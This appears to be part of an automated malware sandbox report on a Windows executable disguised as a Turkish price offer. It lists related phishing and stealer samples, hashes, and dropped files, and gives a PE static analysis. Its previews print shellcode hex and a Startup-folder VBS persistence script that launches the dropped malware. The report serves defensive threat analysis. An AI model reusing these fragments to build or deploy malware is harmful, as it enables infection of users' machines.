	PO 23JC0704-Rollease-B.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	SecuriteInfo.com.Python.Stealer.1437.14994.32063.exe	Get hash	malicious	Python Stealer	Browse	172.67.74.152
	https://wmicrosouab-4ba8.udydzj.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.26.13.205
	CR-FEDEX_TN-775720741041.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	BARSYL SHIPPING Co (VIETNAM).exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	http://damarltda.cl/certificado.php	Get hash	malicious	Unknown	Browse	162.159.61.3
	New Order - DUBAI BURJ KHALIFA LLC - PRICE ENQUIRY - RFQ 60000764690.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.206.230
	Payment MT103.xls	Get hash	malicious	Unknown	Browse	172.67.206.230
	#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe	Get hash	malicious	GuLoader, Remcos	Browse	104.21.60.38
	New DHL Shipment Document Arrival Notice.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	hesaphareketi_1.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Payment MT103.xls	Get hash	malicious	Unknown	Browse	104.21.15.201
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	New Order .doc	Get hash	malicious	Unknown	Browse	172.67.134.136
	orden de compra.vbs	Get hash	malicious	AgentTesla	Browse	104.21.84.67
ACCESS2ITNL	Mcb5K3TOWT.exe	Get hash	malicious	Unknown	Browse	185.227.82.7
	PostalOffice.exe	Get hash	malicious	Unknown	Browse	185.227.82.38
	put.exe	Get hash	malicious	Unknown	Browse	185.243.113.187
	put.exe	Get hash	malicious	Unknown	Browse	185.243.113.187
	file.exe	Get hash	malicious	LummaC, Glupteba, LummaC Stealer, SmokeLoader	Browse	185.227.82.7
	file.exe	Get hash	malicious	LummaC Stealer, SmokeLoader	Browse	185.227.82.7
	SLtb3T91Li.exe	Get hash	malicious	Unknown	Browse	185.227.82.7
	uetfu6ZLWZ.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Stealc	Browse	185.227.82.7
	8as7BA35XQ.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	185.227.82.7
	file.exe	Get hash	malicious	RedLine, SmokeLoader, Stealc, Vidar	Browse	185.227.82.7

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	New DHL Shipment Document Arrival Notice.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	hesaphareketi_1.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	e-dekont.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.26.12.205
	DAIKIN AC SPAIN 2024.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	transferencia.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	1000901 LIQUIDACION.vbs	Get hash	malicious	FormBook, GuLoader	Browse	104.26.12.205
	Zapytanie ofertowe (7427-23 ROCKFIN).vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	Factura240413227178.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	JUSTIFICANTE DE PAGO.vbs	Get hash	malicious	Unknown	Browse	104.26.12.205

Process:	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe
File Type:	ASCII text, with very long lines (29714), with no line terminators
Category:	dropped
Size (bytes):	29714
Entropy (8bit):	3.555177223141755
Encrypted:	false
SSDEEP:	768:PiTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbeE+Ixbi54vfF3if6gy6:PiTZ+2QoioGRk6ZklputwjpjBkCiw2Rk
MD5:	B56907548DB19920D012D3E1EC6B4D39
SHA1:	E02E95EAD9F01081C7EA0ECEB64BD634C3CA1EE3
SHA-256:	04489749AFA35C6C87C3CF15F64BD7C6814FB981A4A7B43F256D3A54DBBE010C
SHA-512:	8BA8F5FCAD74438871AD41943254FDEC8B576D162F4D14A94C98BCB60FBB32A521D5FAD2080A4209BB88126DCE1CC47D0920B165FA18E342922BFF50A9B5D76A
Malicious:	false
Reputation:	low
Preview:	ZXJVISJXZX6R1BKY0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffffba6c0000006689957cffffffb86c0000006689857effffff33c966894d80ba7300

C:\Users\user\AppData\Local\Temp\aut2DED.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	269312
Entropy (8bit):	7.908147264180166
Encrypted:	false
SSDEEP:	6144:iv5eYjaY9xTo2eBr7W2+0+vx1LaMwMlo+7Kvm1065IIw48TYCgd3B4j2gx8Zhj:RX+xqBr7bP+p1La2o+uun1wqCgdR4juL
MD5:	99C0FECCC3E7213F04FC4734D3D10D20
SHA1:	AFFD2601D69D8E565859A16CE450B22F91BF0714
SHA-256:	D7570514149AC138EC797F2E5FA49F86310C370CACC7433023B0888F2E128B8B
SHA-512:	88E5924794AA8D53E583C6E1E78EA7BAAA8396C49F81FAABC1D0FB8CA80E379852B9C4C041AB50BDF4E53319F0CFDF64452495FF0DE6504D552F272205097F44
Malicious:	false
Reputation:	low
Preview:	...Z2IR0LKHU..GU.OXEKH85.PEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXL.Z1I\/.EH.Y.f.X..d. QFo 7%)-5zR(<^'?h75f5 7o1+k.wfo=.+vAUP.IR0HKHU8V.xu>.;g9.Kc!.4\|{3&e@.,;..6~!.9y(.&.:.F.l>;V?.2jyX7.A.5zv+8j$.1.,( .D..EJNXLXZ1IR0HKHUPS.Y?OXEK.}5O.DNN,.X.1IR0HKHU.FdTRNQEK.95O.GJNXLXu.IR0XKHU.GGUY.XE[H85MPEONXLXZ1IW0HKHUPFG5]OXAKH..MPGJN.LXJ1IB0HKHEPFWUYOXEKX85OPEJNXLXZ.\P0.KHUP&EUa.YEKH85OPEJNXLXZ1IR0HKHUPFG..NXYKH85OPEJNXLXZ1IR0HKHUPFGUYO.HIHx5OPEJNXLXZ1I.1H.IUPFGUYOXEKH85OPEJNXLXZ1IR0f?--$FGUA.YEKX85O.DJN\LXZ1IR0HKHUPFGuYO8k9,YA.PE.#XLX.0IR^HKH.QFGUYOXEKH85OP.JN.b<;E(R0H.xUPFgWYONEKH27OPEJNXLXZ1IR0.KH.~44':OXEs.95O0GJN.MXZ.KR0HKHUPFGUYOX.KHx5OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPF

C:\Users\user\AppData\Local\Temp\aut2E3D.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	9934
Entropy (8bit):	7.597195901733284
Encrypted:	false
SSDEEP:	192:0ZsqLUGeKtxWQa88QCnO1yTkC7mdnqUWwrQ3n+sMBz3bTK30kmO4rFpoZoU2Lr/C:zqLFLtx3a8KOIkCKdWwM3+PPK30FO4rA
MD5:	649B389A28D564EC1D816691D49955C8
SHA1:	2F294BCD85AB8989D28A23E1744616AAC6D1F2AA
SHA-256:	FD36DE5378FD6F532046AC0C3916061CE78569643D78E3E1EBEC724B22549F6F
SHA-512:	E0DB5ED30FF7CF33E32C7AFE884190FE3CE263FE6F5349F5A48A0EDF7BEC58B7514000745E769FB7F7C699BBA3AA49830D539E387400E59B3F92B2E6D3B01003
Malicious:	false
Reputation:	low
Preview:	EA06..t..V)UjMN.X.V&.)...Y.^&.Y..c.Ll.;..a2....Y..ob.M.@...a6.N'3I..ib....]........K........\|...o..b..`.....8.....9.X.30...,.....2.Z..k9..6.@.o.l..X......g.9...v0..X....N.,.I.........9..&....r.'.Y...c ....Aa.H.......F.3<..Y@.6...$.`....f@...x..j....Br.....Xf.0..l....n...Y&@5_..h....&.5_..p.U.., 5_....U..,.5_..`.U..f@5\..>3...M.^.a.Z..k6.z..o6......@.....3y..G../Z.M. .....jr....n.u....$.`./.o8...f.G_T.......>_.......zk5....i....3 ...................`.M..`... ...c...@..(.'.4.X.{>K...c.MlS@..X..._..p.....>K.#G.b..3\|v9..G.4.X.@8_..kc..i\|v9....c.h.,v..........7.Ml.K5...M..0;..8.Nf.0.L..6i..f..+..ff6)...6.N,....f...E...Y....3.I.....M.......vI.....0.....2p....<d....,vb........N@!+..'& ....,fo2..,.).......r.2.X...c3k$.ef.Y.!...Gf@....,f.9..,.. .#7.....c.0.....y..p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b.!....F ....B5c.L.3........vn.....f.;%.r...B3P.....;8.X...a.M... ......

C:\Users\user\AppData\Local\Temp\aut5C12.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	269312
Entropy (8bit):	7.908147264180166
Encrypted:	false
SSDEEP:	6144:iv5eYjaY9xTo2eBr7W2+0+vx1LaMwMlo+7Kvm1065IIw48TYCgd3B4j2gx8Zhj:RX+xqBr7bP+p1La2o+uun1wqCgdR4juL
MD5:	99C0FECCC3E7213F04FC4734D3D10D20
SHA1:	AFFD2601D69D8E565859A16CE450B22F91BF0714
SHA-256:	D7570514149AC138EC797F2E5FA49F86310C370CACC7433023B0888F2E128B8B
SHA-512:	88E5924794AA8D53E583C6E1E78EA7BAAA8396C49F81FAABC1D0FB8CA80E379852B9C4C041AB50BDF4E53319F0CFDF64452495FF0DE6504D552F272205097F44
Malicious:	false
Reputation:	low
Preview:	...Z2IR0LKHU..GU.OXEKH85.PEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXL.Z1I\/.EH.Y.f.X..d. QFo 7%)-5zR(<^'?h75f5 7o1+k.wfo=.+vAUP.IR0HKHU8V.xu>.;g9.Kc!.4\|{3&e@.,;..6~!.9y(.&.:.F.l>;V?.2jyX7.A.5zv+8j$.1.,( .D..EJNXLXZ1IR0HKHUPS.Y?OXEK.}5O.DNN,.X.1IR0HKHU.FdTRNQEK.95O.GJNXLXu.IR0XKHU.GGUY.XE[H85MPEONXLXZ1IW0HKHUPFG5]OXAKH..MPGJN.LXJ1IB0HKHEPFWUYOXEKX85OPEJNXLXZ.\P0.KHUP&EUa.YEKH85OPEJNXLXZ1IR0HKHUPFG..NXYKH85OPEJNXLXZ1IR0HKHUPFGUYO.HIHx5OPEJNXLXZ1I.1H.IUPFGUYOXEKH85OPEJNXLXZ1IR0f?--$FGUA.YEKX85O.DJN\LXZ1IR0HKHUPFGuYO8k9,YA.PE.#XLX.0IR^HKH.QFGUYOXEKH85OP.JN.b<;E(R0H.xUPFgWYONEKH27OPEJNXLXZ1IR0.KH.~44':OXEs.95O0GJN.MXZ.KR0HKHUPFGUYOX.KHx5OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPF

C:\Users\user\AppData\Local\Temp\aut5C51.tmp

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	9934
Entropy (8bit):	7.597195901733284
Encrypted:	false
SSDEEP:	192:0ZsqLUGeKtxWQa88QCnO1yTkC7mdnqUWwrQ3n+sMBz3bTK30kmO4rFpoZoU2Lr/C:zqLFLtx3a8KOIkCKdWwM3+PPK30FO4rA
MD5:	649B389A28D564EC1D816691D49955C8
SHA1:	2F294BCD85AB8989D28A23E1744616AAC6D1F2AA
SHA-256:	FD36DE5378FD6F532046AC0C3916061CE78569643D78E3E1EBEC724B22549F6F
SHA-512:	E0DB5ED30FF7CF33E32C7AFE884190FE3CE263FE6F5349F5A48A0EDF7BEC58B7514000745E769FB7F7C699BBA3AA49830D539E387400E59B3F92B2E6D3B01003
Malicious:	false
Reputation:	low
Preview:	EA06..t..V)UjMN.X.V&.)...Y.^&.Y..c.Ll.;..a2....Y..ob.M.@...a6.N'3I..ib....]........K........\|...o..b..`.....8.....9.X.30...,.....2.Z..k9..6.@.o.l..X......g.9...v0..X....N.,.I.........9..&....r.'.Y...c ....Aa.H.......F.3<..Y@.6...$.`....f@...x..j....Br.....Xf.0..l....n...Y&@5_..h....&.5_..p.U.., 5_....U..,.5_..`.U..f@5\..>3...M.^.a.Z..k6.z..o6......@.....3y..G../Z.M. .....jr....n.u....$.`./.o8...f.G_T.......>_.......zk5....i....3 ...................`.M..`... ...c...@..(.'.4.X.{>K...c.MlS@..X..._..p.....>K.#G.b..3\|v9..G.4.X.@8_..kc..i\|v9....c.h.,v..........7.Ml.K5...M..0;..8.Nf.0.L..6i..f..+..ff6)...6.N,....f...E...Y....3.I.....M.......vI.....0.....2p....<d....,vb........N@!+..'& ....,fo2..,.).......r.2.X...c3k$.ef.Y.!...Gf@....,f.9..,.. .#7.....c.0.....y..p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b.!....F ....B5c.L.3........vn.....f.;%.r...B3P.....;8.X...a.M... ......

C:\Users\user\AppData\Local\Temp\autBC22.tmp

Download File

Process:	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe
File Type:	data
Category:	dropped
Size (bytes):	269312
Entropy (8bit):	7.908147264180166
Encrypted:	false
SSDEEP:	6144:iv5eYjaY9xTo2eBr7W2+0+vx1LaMwMlo+7Kvm1065IIw48TYCgd3B4j2gx8Zhj:RX+xqBr7bP+p1La2o+uun1wqCgdR4juL
MD5:	99C0FECCC3E7213F04FC4734D3D10D20
SHA1:	AFFD2601D69D8E565859A16CE450B22F91BF0714
SHA-256:	D7570514149AC138EC797F2E5FA49F86310C370CACC7433023B0888F2E128B8B
SHA-512:	88E5924794AA8D53E583C6E1E78EA7BAAA8396C49F81FAABC1D0FB8CA80E379852B9C4C041AB50BDF4E53319F0CFDF64452495FF0DE6504D552F272205097F44
Malicious:	false
Reputation:	low
Preview:	...Z2IR0LKHU..GU.OXEKH85.PEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXL.Z1I\/.EH.Y.f.X..d. QFo 7%)-5zR(<^'?h75f5 7o1+k.wfo=.+vAUP.IR0HKHU8V.xu>.;g9.Kc!.4\|{3&e@.,;..6~!.9y(.&.:.F.l>;V?.2jyX7.A.5zv+8j$.1.,( .D..EJNXLXZ1IR0HKHUPS.Y?OXEK.}5O.DNN,.X.1IR0HKHU.FdTRNQEK.95O.GJNXLXu.IR0XKHU.GGUY.XE[H85MPEONXLXZ1IW0HKHUPFG5]OXAKH..MPGJN.LXJ1IB0HKHEPFWUYOXEKX85OPEJNXLXZ.\P0.KHUP&EUa.YEKH85OPEJNXLXZ1IR0HKHUPFG..NXYKH85OPEJNXLXZ1IR0HKHUPFGUYO.HIHx5OPEJNXLXZ1I.1H.IUPFGUYOXEKH85OPEJNXLXZ1IR0f?--$FGUA.YEKX85O.DJN\LXZ1IR0HKHUPFGuYO8k9,YA.PE.#XLX.0IR^HKH.QFGUYOXEKH85OP.JN.b<;E(R0H.xUPFgWYONEKH27OPEJNXLXZ1IR0.KH.~44':OXEs.95O0GJN.MXZ.KR0HKHUPFGUYOX.KHx5OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPF

C:\Users\user\AppData\Local\Temp\autBC81.tmp

Download File

Process:	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe
File Type:	data
Category:	dropped
Size (bytes):	9934
Entropy (8bit):	7.597195901733284
Encrypted:	false
SSDEEP:	192:0ZsqLUGeKtxWQa88QCnO1yTkC7mdnqUWwrQ3n+sMBz3bTK30kmO4rFpoZoU2Lr/C:zqLFLtx3a8KOIkCKdWwM3+PPK30FO4rA
MD5:	649B389A28D564EC1D816691D49955C8
SHA1:	2F294BCD85AB8989D28A23E1744616AAC6D1F2AA
SHA-256:	FD36DE5378FD6F532046AC0C3916061CE78569643D78E3E1EBEC724B22549F6F
SHA-512:	E0DB5ED30FF7CF33E32C7AFE884190FE3CE263FE6F5349F5A48A0EDF7BEC58B7514000745E769FB7F7C699BBA3AA49830D539E387400E59B3F92B2E6D3B01003
Malicious:	false
Reputation:	low
Preview:	EA06..t..V)UjMN.X.V&.)...Y.^&.Y..c.Ll.;..a2....Y..ob.M.@...a6.N'3I..ib....]........K........\|...o..b..`.....8.....9.X.30...,.....2.Z..k9..6.@.o.l..X......g.9...v0..X....N.,.I.........9..&....r.'.Y...c ....Aa.H.......F.3<..Y@.6...$.`....f@...x..j....Br.....Xf.0..l....n...Y&@5_..h....&.5_..p.U.., 5_....U..,.5_..`.U..f@5\..>3...M.^.a.Z..k6.z..o6......@.....3y..G../Z.M. .....jr....n.u....$.`./.o8...f.G_T.......>_.......zk5....i....3 ...................`.M..`... ...c...@..(.'.4.X.{>K...c.MlS@..X..._..p.....>K.#G.b..3\|v9..G.4.X.@8_..kc..i\|v9....c.h.,v..........7.Ml.K5...M..0;..8.Nf.0.L..6i..f..+..ff6)...6.N,....f...E...Y....3.I.....M.......vI.....0.....2p....<d....,vb........N@!+..'& ....,fo2..,.).......r.2.X...c3k$.ef.Y.!...Gf@....,f.9..,.. .#7.....c.0.....y..p.h.s.....,vf......t.L@...40.....f....N&3....4..@.6.-..p..S.-..2...S0.N.@.;5.`..9.M,`...k8.....c.P..Yf3.wx.....vl......@.E....N.y6....p.c3.%..4..b.!....F ....B5c.L.3........vn.....f.;%.r...B3P.....;8.X...a.M... ......

C:\Users\user\AppData\Local\Temp\vitraillist

Download File

Process:	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe
File Type:	data
Category:	dropped
Size (bytes):	269312
Entropy (8bit):	7.908147264180166
Encrypted:	false
SSDEEP:	6144:iv5eYjaY9xTo2eBr7W2+0+vx1LaMwMlo+7Kvm1065IIw48TYCgd3B4j2gx8Zhj:RX+xqBr7bP+p1La2o+uun1wqCgdR4juL
MD5:	99C0FECCC3E7213F04FC4734D3D10D20
SHA1:	AFFD2601D69D8E565859A16CE450B22F91BF0714
SHA-256:	D7570514149AC138EC797F2E5FA49F86310C370CACC7433023B0888F2E128B8B
SHA-512:	88E5924794AA8D53E583C6E1E78EA7BAAA8396C49F81FAABC1D0FB8CA80E379852B9C4C041AB50BDF4E53319F0CFDF64452495FF0DE6504D552F272205097F44
Malicious:	false
Reputation:	low
Preview:	...Z2IR0LKHU..GU.OXEKH85.PEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXL.Z1I\/.EH.Y.f.X..d. QFo 7%)-5zR(<^'?h75f5 7o1+k.wfo=.+vAUP.IR0HKHU8V.xu>.;g9.Kc!.4\|{3&e@.,;..6~!.9y(.&.:.F.l>;V?.2jyX7.A.5zv+8j$.1.,( .D..EJNXLXZ1IR0HKHUPS.Y?OXEK.}5O.DNN,.X.1IR0HKHU.FdTRNQEK.95O.GJNXLXu.IR0XKHU.GGUY.XE[H85MPEONXLXZ1IW0HKHUPFG5]OXAKH..MPGJN.LXJ1IB0HKHEPFWUYOXEKX85OPEJNXLXZ.\P0.KHUP&EUa.YEKH85OPEJNXLXZ1IR0HKHUPFG..NXYKH85OPEJNXLXZ1IR0HKHUPFGUYO.HIHx5OPEJNXLXZ1I.1H.IUPFGUYOXEKH85OPEJNXLXZ1IR0f?--$FGUA.YEKX85O.DJN\LXZ1IR0HKHUPFGuYO8k9,YA.PE.#XLX.0IR^HKH.QFGUYOXEKH85OP.JN.b<;E(R0H.xUPFgWYONEKH27OPEJNXLXZ1IR0.KH.~44':OXEs.95O0GJN.MXZ.KR0HKHUPFGUYOX.KHx5OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPFGUYOXEKH85OPEJNXLXZ1IR0HKHUPF

C:\Users\user\AppData\Local\directory\name.exe

Download File

Process:	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	115505152
Entropy (8bit):	7.999606584590527
Encrypted:	true
SSDEEP:	393216:Y3dR+5AtzhezBDqrBwp54g1U0h7gPyLarJRR+GyJfC0KHxvkZ96FYA2nEhjUBR+0:4bhTD15yzEke6ooJvVTuo+ffaAkd3
MD5:	38F208E435D774A275ADA42C57F332FD
SHA1:	2FD94ABCE8A0574B6A4E6236A6017EF2185FF8AB
SHA-256:	681FD8DA1D1161994761CB90D6A690457DC34BDD6079BD63513397835A2DFF9D
SHA-512:	E7F61DF8EAB7E7844AAA322C6250C563FAE521AF6951D7022D55DCE957A924AF2F43717715B1F7076310E26C952CCBBF35BEB11F569C1F45551DB7ADD6A119B9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....Y&f..........".................w.............@.................................t.....@...@.......@.....................d...\|....@.......................P...u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc........@......................@..@.reloc...u...P...v..................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Download File

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	modified
Size (bytes):	274
Entropy (8bit):	3.408374803490271
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclzXUEZ+lX1Al1AE6nriIM8lfQVn:DsO+vNlDQ1A1z4mA2n
MD5:	86948B136B1F801E8D67F09107FE8579
SHA1:	958A64F475E162FD6B7EE3A5CC11E1D49EF7CF99
SHA-256:	AAE1242E1E0755FD14206D7FF8807311E68529F049AB1A47EA105E405C9494F7
SHA-512:	9572FB2BCBB26BFF379A3ED930BEFECD6BC1A185A8FD5B47E60D7B09A50CD49C8B92569EB9667B0EFE71540232E46BC3D64B8BAB8A5996EAB9CE3625B5E08E4F
Malicious:	true
Reputation:	low
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.d.i.r.e.c.t.o.r.y.\.n.a.m.e...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.09016213107268
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	F#U0130YAT TEKL#U0130F.exe
File size:	1'210'368 bytes
MD5:	47cc3bb8bb0427d4ce5da71c2cf3702f
SHA1:	cb11ece89c4bb3cb337a32107af9504ed7deb89a
SHA256:	04d2e21d12836aeb42dea69f39783165668427397987d8ce55c94765effb844b
SHA512:	360cf9cfc9e59cece552a2b32dc7fa81294fa75379f23363eb6676b3aa135fd457139a0b004bea71c1e1965de57b77f53f6e92f085b513070f6027381ccd42f4
SSDEEP:	24576:QqDEvCTbMWu7rQYlBQcBiT6rprG8adzLPDTG4sKxN8:QTvC/MTQYxsWR7adzLLq45x
TLSH:	0F45CF027381D062FFAB92334F5AF6115ABC7A260123E62F13981D79BD705B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x420577
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66265982 [Mon Apr 22 12:35:14 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	948cc502fe9226992dce9417f952fce3

Entrypoint Preview

Instruction
call 00007F74C0918D13h
jmp 00007F74C091861Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F74C09187FDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F74C09187CAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007F74C091B3BDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007F74C091B408h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
